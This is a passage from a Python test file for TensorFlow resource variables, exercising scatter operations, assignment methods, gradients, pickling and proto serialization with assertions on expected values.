self.evaluate(v.initializer)
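# With a caching device, fetching v and v.assign_add in the same run is
# expected to read the cached value before the write lands, so the fetched
# value is still 0.0.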
value, _ = sess.run([v, v.assign_add(1.0)])
self.assertAllEqual(value, 0.0)
def testAssignVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1]))
# The error message varies depending on whether it is being raised
# by the kernel or shape inference. The shape inference code path can
# be reached when running in eager op as function mode where each op
# is wrapped in a tf.function.
with self.assertRaisesRegex(
errors.InvalidArgumentError, r"Trying to .* variable with wrong "
r"dtype. Expected int32 got float"):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1.], dtype=dtypes.float32))
def testRepr(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
text = "%r" % v
self.assertEqual(
"<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=1>", text)
def testReprUnavailable(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
# Monkey-patch this variable to not have an available value
def broken_read():
raise ValueError("This doesn't work")
v.read_value = broken_read
text = "%r" % v
self.assertEqual("<tf.Variable 'Variable:0' shape=() dtype=int32,"
" numpy=<unavailable>>", text)
def testFormatResourceHandle(self):
with context.eager_mode():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertIn("<ResourceHandle", str(handle))
self.assertIn("<ResourceHandle", repr(handle))
@test_util.run_in_graph_and_eager_modes
def testDtypeSurvivesIdentity(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
id_handle = array_ops.identity(handle)
self.evaluate(resource_variable_ops.assign_variable_op(
id_handle, constant_op.constant(0, dtype=dtypes.int32)))
def testUnreadOpName(self):
v = resource_variable_ops.ResourceVariable(1.0)
self.assertNotEqual(v.name, v.assign_add(1.0).name)
@test_util.run_in_graph_and_eager_modes
def testCreateRead(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
value = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertAllEqual(1, value)
@test_util.run_in_graph_and_eager_modes
def testManyAssigns(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
create = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32))
with ops.control_dependencies([create]):
first_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
with ops.control_dependencies([first_read]):
write = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(2, dtype=dtypes.int32))
with ops.control_dependencies([write]):
second_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
f, s = self.evaluate([first_read, second_read])
self.assertEqual(f, 1)
self.assertEqual(s, 2)
@test_util.run_in_graph_and_eager_modes
def testAssignAdd(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
self.evaluate(resource_variable_ops.assign_add_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
read = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertEqual(read, 2)
@test_util.run_in_graph_and_eager_modes
def testScatterAdd(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNd(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1, 1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads), [[0., 0.], [0., 1.]])
@test_util.run_deprecated_v1
def testDefaultGradientDtype(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float64)
c = constant_op.constant(1.)
identity = array_ops.identity_n([c, v.handle])
# TODO(b/137403775): Remove this.
handle_data_util.copy_handle_data(v.handle, identity[1])
g = gradients_impl.gradients(identity[0], [c, v.handle])
self.assertEqual(g[1].dtype, dtypes.float64)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(g[1], [[0., 0.], [0., 0.]])
@test_util.run_deprecated_v1
def testUnconnectedGradientZeros(self):
b = resource_variable_ops.ResourceVariable(initial_value=[[3., 4.]])
c = constant_op.constant(0.)
g = gradients_impl.gradients(c, [b], unconnected_gradients="zero")[0]
self.assertAllEqual(g.shape.as_list(), [1, 2])
@test_util.run_deprecated_v1
def testGradientCondInWhileLoop(self):
v = resource_variable_ops.ResourceVariable(initial_value=1.0)
def cond(i, unused_x):
return i < 1
def body(i, x):
def true():
return x + v
def false():
return 2.0 * v
return i + 1, control_flow_ops.cond(i > 0, true, false)
_, x = control_flow_ops.while_loop(cond, body, [0, 0.0])
# Computing gradients does not produce an exception:
g = gradients_impl.gradients(x, v)
self.evaluate(variables.global_variables_initializer())
# Only the false branch is taken so the gradient is 2.
self.assertAllEqual(g[0], 2.0)
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNdIndexedSlices(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1], [1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads.values), [[1., 1.], [1., 1.]])
@test_util.run_in_graph_and_eager_modes
def testScatterSub(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMul(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant([[5]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
def testEagerPickle(self):
with context.eager_mode():
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, "var.pickle")
with open(fname, "wb") as f:
v = resource_variable_ops.ResourceVariable(
10.0,
dtype=dtypes.float16,
name="v")
pickle.dump(v, f)
with open(fname, "rb") as f:
new_v = pickle.load(f)
self.assertEqual(new_v.name, v.name)
self.assertEqual(new_v.shape, v.shape)
self.assertEqual(new_v.dtype, v.dtype)
self.assertEqual(new_v.trainable, v.trainable)
self.assertAllEqual(new_v.numpy(), v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterDiv(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
def testUseResource(self):
v = variables.VariableV1(1.0, use_resource=True)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
def testEagerNoUseResource(self):
with context.eager_mode():
v = variables.Variable(1.0)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
@test_util.run_in_graph_and_eager_modes
def testScatterMin(self):
with ops.device("cpu:0"):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[[6]],
dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(handle, [0],
constant_op.constant(
[[3]],
dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
def testMetagraph(self):
with ops.Graph().as_default():
with variable_scope.variable_scope("foo", use_resource=True):
a = variable_scope.get_variable("a", initializer=10.0)
momentum.MomentumOptimizer(
learning_rate=0.001, momentum=0.1).minimize(
a,
colocate_gradients_with_ops=True,
global_step=training_util.get_or_create_global_step())
graph = ops.get_default_graph()
meta_graph_def = saver.export_meta_graph(graph=graph)
with ops.Graph().as_default():
saver.import_meta_graph(meta_graph_def, import_scope="")
meta_graph_two = saver.export_meta_graph(graph=graph)
self.assertEqual(meta_graph_def, meta_graph_two)
@test_util.run_in_graph_and_eager_modes
def testScatterMax(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@test_util.run_in_graph_and_eager_modes
def testScatterAddScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterSubScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMulScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant(5, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
@test_util.run_in_graph_and_eager_modes
def testScatterDivScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
@test_util.run_in_graph_and_eager_modes
def testScatterMinScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterMaxScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterAddVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 1.5],
name="add",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_add(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.5], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 4.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterSubVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 2.5],
name="sub",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_sub(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([1.5], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 1.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterMaxVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 4.0],
name="max1",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([5.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 5.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5],
name="max2",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 3.5], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterMinVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 4.0],
name="min1",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([5.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 4.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5],
name="min2",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 2.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterMulVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 4.0],
name="mul",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_mul(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([3.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 12.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterDivVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 6.0],
name="div",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_div(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 3.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 6.0],
name="update",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_update(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([3.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 3.0], self.evaluate(v))
@test_util.run_deprecated_v1
def testScatterUpdateString(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.string, shape=[1, 1])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant([["a"]], dtype=dtypes.string)))
self.evaluate(resource_variable_ops.resource_scatter_update(
handle, [0], constant_op.constant([["b"]], dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(compat.as_bytes(self.evaluate(read)[0][0]),
compat.as_bytes("b"))
@test_util.run_deprecated_v1
def testScatterUpdateStringScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.string, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[["a"]],
dtype=dtypes.string)))
self.evaluate(
resource_variable_ops.resource_scatter_update(handle, [0],
constant_op.constant(
"b",
dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(
compat.as_bytes(self.evaluate(read)[0][0]), compat.as_bytes("b"))
# TODO(alive): get this to work in Eager mode.
def testGPU(self):
with test_util.use_gpu():
abc = variable_scope.get_variable(
"abc",
shape=[1],
initializer=init_ops.ones_initializer(),
use_resource=True)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(
self.evaluate(
resource_variable_ops.var_is_initialized_op(abc.handle)),
True)
def testScatterBool(self):
with context.eager_mode():
ref = resource_variable_ops.ResourceVariable(
[False, True, False], trainable=False)
indices = math_ops.range(3)
updates = constant_op.constant([True, True, True])
state_ops.scatter_update(ref, indices, updates)
self.assertAllEqual(ref.read_value(), [True, True, True])
@test_util.run_in_graph_and_eager_modes
def testConstraintArg(self):
constraint = lambda x: x
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var0")
self.assertEqual(v.constraint, constraint)
constraint = 0
with self.assertRaises(ValueError):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var1")
# TODO(alive): how should this work in Eager mode?
@test_util.run_deprecated_v1
def testInitFn(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32)
self.assertEqual(v.handle.op.colocation_groups(),
v.initializer.inputs[1].op.colocation_groups())
def testCountUpTo(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(v.count_up_to(1), 0)
with self.assertRaises(errors.OutOfRangeError):
v.count_up_to(1)
def testCountUpToFunction(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(state_ops.count_up_to(v, 1), 0)
with self.assertRaises(errors.OutOfRangeError):
state_ops.count_up_to(v, 1)
@test_util.run_in_graph_and_eager_modes
def testInitFnDtype(self):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32, name="var0")
self.assertEqual(dtypes.float32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitFnNoDtype(self):
v = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="var2")
self.assertEqual(dtypes.int32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitializeAllVariables(self):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.float32,
name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testOperatorOverload(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(2.0, self.evaluate(v + v))
@test_util.run_in_graph_and_eager_modes
def testAssignMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign(2.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign(3.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign(4.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
def testAssignRuntimeShapeCheck(self):
with forward_compat.forward_compatibility_horizon(2022, 3, 2):
v = resource_variable_ops.ResourceVariable([1.0, 1.0], name="var0")
@def_function.function
def f(shape):
t = array_ops.zeros(shape)
v.assign(t)
with self.assertRaises((errors.InvalidArgumentError, ValueError)):
f(constant_op.constant([3]))
@test_util.run_in_graph_and_eager_modes
def testLoad(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
v.load(2.0)
self.assertEqual(2.0, self.evaluate(v.value()))
def testShapePassedToGradient(self):
with ops.Graph().as_default():
@custom_gradient.custom_gradient
def differentiable_scatter_update(handle, indices, values):
with ops.control_dependencies([
resource_variable_ops.resource_scatter_update(
handle, indices, values)]):
new_handle = array_ops.identity(handle)
def grad(dresult):
self.assertIsNotNone(
tensor_util.constant_value(dresult.dense_shape))
return [dresult, None, None]
return new_handle, grad
var = variable_scope.get_variable(
"foo", shape=[20], initializer=init_ops.zeros_initializer,
dtype=dtypes.float64, use_resource=True)
indices = math_ops.range(10)
updates = math_ops.range(9, -1, -1, dtype=dtypes.float64)
new_handle = differentiable_scatter_update(var.handle, indices, updates)
gathered = resource_variable_ops.resource_gather(
new_handle, indices, dtype=var.dtype)
gradients_impl.gradients([gathered], [updates])
def testToFromProtoCachedValue(self):
with ops.Graph().as_default():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
v_prime = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertIsNone(getattr(v_prime, "_cached_value", None))
other_v_def = resource_variable_ops.ResourceVariable(
caching_device="cpu:0",
initial_value=constant_op.constant(3.0)).to_proto()
other_v_prime = resource_variable_ops.ResourceVariable(
variable_def=other_v_def)
self.assertIsNotNone(other_v_prime._cached_value)
def testVariableDefInitializedInstances(self):
with ops.Graph().as_default(), self.cached_session():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
with ops.Graph().as_default(), self.cached_session():
# v describes a VariableDef-based variable without an initial value.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertEqual(3.0, self.evaluate(v.initialized_value()))
# initialized_value should not rerun the initializer_op if the variable
# has already been initialized elsewhere.
self.evaluate(v.assign(1.0))
self.assertEqual(1.0, v.initialized_value().eval())
v_def.ClearField("initial_value_name")
with ops.Graph().as_default(), self.cached_session():
# Restoring a legacy VariableDef proto that does not have
# initial_value_name set should still work.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
# We should also be able to re-export the variable to a new meta graph.
self.assertProtoEquals(v_def, v.to_proto())
# But attempts to use initialized_value will result in errors.
with self.assertRaises(ValueError):
self.evaluate(v.initialized_value())
def testTrainableInProto(self):
with ops.Graph().as_default():
non_trainable_variable = resource_variable_ops.ResourceVariable(
trainable=False,
initial_value=constant_op.constant(10.0))
self.assertEqual(
False,
resource_variable_ops.ResourceVariable(
variable_def=non_trainable_variable.to_proto())
.trainable)
trainable_variable = resource_variable_ops.ResourceVariable(
trainable=True,
initial_value=constant_op.constant(10.0))
self.assertEqual(
True,
resource_variable_ops.ResourceVariable(
variable_def=trainable_variable.to_proto())
.trainable)
@test_util.run_in_graph_and_eager_modes
def testSparseRead(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value = self.evaluate(v.sparse_read([0, 3, 1, 2]))
self.assertAllEqual(init_value[[0, 3, 1, 2], ...], value)
@test_util.run_in_graph_and_eager_modes
def testGatherNd(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value_op = v.gather_nd([[0, 0], [1, 2], [3, 3]])
self.assertAllEqual([3, 4], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([[0, 1, 2, 3], [24, 25, 26, 27], [60, 61, 62, 63]],
value)
value_op = v.gather_nd([[0, 0, 0], [1, 2, 3], [3, 3, 3]])
self.assertAllEqual([3], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([0, 27, 63], value)
@test_util.run_deprecated_v1
def testToFromProto(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertEqual(2, math_ops.add(w, 1).eval())
self.assertEqual(v._handle, w._handle)
self.assertEqual(v._graph_element, w._graph_element)
@test_util.run_in_graph_and_eager_modes
def testAssignAddMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_add(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_add(1.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_add(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testAssignSubMethod(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_sub(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_sub(1.0, read_value=True)
self.assertEqual(1.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_sub(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(0.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testDestroyResource(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3.0, self.evaluate(v.value()))
self.evaluate(resource_variable_ops.destroy_resource_op(v.handle))
if context.executing_eagerly():
# eager mode creates ref-counting variable handles unaffected by
# DestroyResourceOp.
self.assertEqual(3.0, self.evaluate(v.value()))
else:
with self.assertRaises(errors.FailedPreconditionError):
self.evaluate(v.value())
# Handle to a resource not actually created.
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
# Should raise no exception
self.evaluate(resource_variable_ops.destroy_resource_op(
handle, ignore_lookup_error=True))
@test_util.run_deprecated_v1
def testAssignDifferentShapes(self):
with self.cached_session() as sess, variable_scope.variable_scope(
"foo", use_resource=True):
var = variable_scope.get_variable("x", shape=[1, 1], dtype=dtypes.float32)
placeholder = array_ops.placeholder(dtypes.float32)
assign = var.assign(placeholder)
sess.run(
[assign],
feed_dict={placeholder: np.zeros(shape=[2, 2], dtype=np.float32)})
def testAssignDifferentShapesEagerNotAllowed(self):
with context.eager_mode():
with variable_scope.variable_scope("foo"):
var = variable_scope.get_variable("x", shape=[1, 1],
dtype=dtypes.float32)
with self.assertRaisesRegex(ValueError,
"shape.*and.*are incompatible"):
assign = var.assign(np.zeros(shape=[2, 2]))
self.evaluate(assign)
@test_util.disable_xla("XLA doesn't allow changing shape at assignment, as "
"dictated by tf2xla/xla_resource.cc:SetTypeAndShape")
@test_util.run_in_graph_and_eager_modes
def testAssignDifferentShapesAllowed(self):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[1, 1]),
shape=tensor_shape.TensorShape(None))
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(np.zeros(shape=[1, 1]), var.read_value())
self.evaluate(var.assign(np.zeros(shape=[2, 2])))
self.assertAllEqual(np.zeros(shape=[2, 2]), var.read_value())
@test_util.run_in_graph_and_eager_modes
def testAssignReturnsVariable(self):
var = resource_variable_ops.ResourceVariable(1.)
self.evaluate(variables.global_variables_initializer())
assigned = var.assign(2.)
self.assertIsInstance(assigned, resource_variable_ops.BaseResourceVariable)
assigned = assigned.assign(3.)
self.assertEqual(self.evaluate(assigned), 3.)
self.assertEqual(self.evaluate(var), 3.)
self.assertEqual(self.evaluate(var.assign_add(1.).assign_add(1.)), 5)
self.assertEqual(self.evaluate(var.assign_sub(1.).assign_sub(1.)), 3)
var = resource_variable_ops.ResourceVariable([1., 2.])
self.evaluate(variables.global_variables_initializer())
slices = indexed_slices.IndexedSlices(indices=[1], values=[2])
def assert_eq(tensor, vals):
self.assertAllEqual(self.evaluate(tensor), vals)
assert_eq(var.scatter_add(slices).scatter_add(slices), [1., 6.])
assert_eq(var.scatter_sub(slices).scatter_sub(slices), [1., 2.])
slices2 = indexed_slices.IndexedSlices(indices=[0], values=[3])
assert_eq(var.scatter_max(slices2).scatter_add(slices), [3., 4.])
